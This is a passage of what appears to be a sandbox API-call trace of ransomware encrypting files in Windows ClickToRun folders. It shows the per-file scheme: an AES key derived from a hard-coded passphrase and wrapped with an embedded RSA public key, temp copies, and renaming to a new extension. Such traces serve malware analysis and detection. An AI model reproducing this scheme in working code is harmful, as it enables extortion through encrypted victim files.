(lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.484] GetLastError () returned 0x5 [0235.484] GetLastError () returned 0x5 [0235.484] FindNextFileA (in: hFindFile=0x27ebea0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0235.484] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x27ebe60 [0235.493] FindNextFileA (in: hFindFile=0x27ebe60, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.493] FindNextFileA (in: hFindFile=0x27ebe60, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.493] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.493] GetLastError () returned 0x5 [0235.493] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\masterdescriptor.x-none.xml")) returned 0x20 [0235.493] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml", dwFileAttributes=0x80) returned 0 [0235.494] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\masterdescriptor.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.494] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\masterdescriptor.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.494] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.494] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x27e8008) returned 1 [0235.504] CryptCreateHash (in: hProv=0x27e8008, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.504] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0235.504] CryptHashData (hHash=0x27eb960, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.504] CryptDeriveKey (in: hProv=0x27e8008, Algid=0x6610, hBaseData=0x27eb960, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27ebc20) returned 1 [0235.504] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.504] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.504] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x27e8668) returned 1 [0235.507] CryptImportPublicKeyInfo (in: hCryptProv=0x27e8668, dwCertEncodingType=0x1, pInfo=0x2796a28*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2796a58*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2796a60*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27ebde0) returned 1 [0235.507] CryptEncrypt (in: hKey=0x27ebde0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.507] CryptEncrypt (in: hKey=0x27ebde0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e8448*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x27e8448*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.507] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e8448, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.507] ReadFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x275a810, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.508] CryptEncrypt (in: hKey=0x27ebc20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.508] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.508] CloseHandle (hObject=0xffffffff) returned 1 [0235.508] CloseHandle (hObject=0xffffffff) returned 1 [0235.508] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\masterdescriptor.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\masterdescriptor.x-none.xml"), bFailIfExists=0) returned 0 [0235.508] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml", dwFileAttributes=0x0) returned 0 [0235.508] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\masterdescriptor.x-none.xml.gsg")) returned 0 [0235.508] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\masterdescriptor.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\masterdescriptor.x-none.xml.fuck")) returned 0 [0235.509] CryptDestroyHash (hHash=0x27eb960) returned 1 [0235.509] CryptDestroyKey (hKey=0x27ebc20) returned 1 [0235.509] CryptReleaseContext (hProv=0x27e8008, dwFlags=0x0) returned 1 [0235.509] FindNextFileA (in: hFindFile=0x27ebe60, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.509] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.509] GetLastError () returned 0x5 [0235.509] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\s640.hash")) returned 0x20 [0235.509] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash", dwFileAttributes=0x80) returned 0 [0235.509] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\s640.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.510] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\s640.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.510] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash.gsg", dwFileAttributes=0x2) returned 0 [0235.510] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x27e82b0) returned 1 [0235.519] CryptCreateHash (in: hProv=0x27e82b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.519] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0235.519] CryptHashData (hHash=0x27eb8a0, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.519] CryptDeriveKey (in: hProv=0x27e82b0, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27ebda0) returned 1 [0235.519] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.519] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.519] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x27e83c0) returned 1 [0235.522] CryptImportPublicKeyInfo (in: hCryptProv=0x27e83c0, dwCertEncodingType=0x1, pInfo=0x2797318*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2797348*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2797350*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27ebee0) returned 1 [0235.522] CryptEncrypt (in: hKey=0x27ebee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.522] CryptEncrypt (in: hKey=0x27ebee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e8a20*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x27e8a20*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.522] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e8a20, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.522] ReadFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x275a810, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.522] CryptEncrypt (in: hKey=0x27ebda0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.523] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.523] CloseHandle (hObject=0xffffffff) returned 1 [0235.523] CloseHandle (hObject=0xffffffff) returned 1 [0235.523] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\s640.hash.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\s640.hash"), bFailIfExists=0) returned 0 [0235.523] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash", dwFileAttributes=0x0) returned 0 [0235.523] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\s640.hash.gsg")) returned 0 [0235.524] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\s640.hash"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\s640.hash.fuck")) returned 0 [0235.524] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0235.524] CryptDestroyKey (hKey=0x27ebda0) returned 1 [0235.524] CryptReleaseContext (hProv=0x27e82b0, dwFlags=0x0) returned 1 [0235.524] FindNextFileA (in: hFindFile=0x27ebe60, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.524] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.524] GetLastError () returned 0x5 [0235.524] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.platform.x-none.man.xml")) returned 0x20 [0235.525] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml", dwFileAttributes=0x80) returned 0 [0235.525] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.platform.x-none.man.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.525] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.platform.x-none.man.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.525] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.526] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x27e8558) returned 1 [0235.536] CryptCreateHash (in: hProv=0x27e8558, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.536] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0235.536] CryptHashData (hHash=0x27ebd60, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.536] CryptDeriveKey (in: hProv=0x27e8558, Algid=0x6610, hBaseData=0x27ebd60, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27ebbe0) returned 1 [0235.536] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.536] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.536] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x27e86f0) returned 1 [0235.538] CryptImportPublicKeyInfo (in: hCryptProv=0x27e86f0, dwCertEncodingType=0x1, pInfo=0x2796f08*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2796f38*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2796f40*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27ebfa0) returned 1 [0235.538] CryptEncrypt (in: hKey=0x27ebfa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.539] CryptEncrypt (in: hKey=0x27ebfa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e9080*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x27e9080*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.539] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e9080, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.539] ReadFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x275a810, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.539] CryptEncrypt (in: hKey=0x27ebbe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.539] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.539] CloseHandle (hObject=0xffffffff) returned 1 [0235.539] CloseHandle (hObject=0xffffffff) returned 1 [0235.539] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.platform.x-none.man.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.platform.x-none.man.xml"), bFailIfExists=0) returned 0 [0235.539] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml", dwFileAttributes=0x0) returned 0 [0235.540] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.platform.x-none.man.xml.gsg")) returned 0 [0235.540] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.platform.x-none.man.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.platform.x-none.man.xml.fuck")) returned 0 [0235.540] CryptDestroyHash (hHash=0x27ebd60) returned 1 [0235.540] CryptDestroyKey (hKey=0x27ebbe0) returned 1 [0235.540] CryptReleaseContext (hProv=0x27e8558, dwFlags=0x0) returned 1 [0235.540] FindNextFileA (in: hFindFile=0x27ebe60, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.541] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.541] GetLastError () returned 0x5 [0235.541] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.hash")) returned 0x20 [0235.541] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash", dwFileAttributes=0x80) returned 0 [0235.541] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.541] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash.gsg" (normalized: 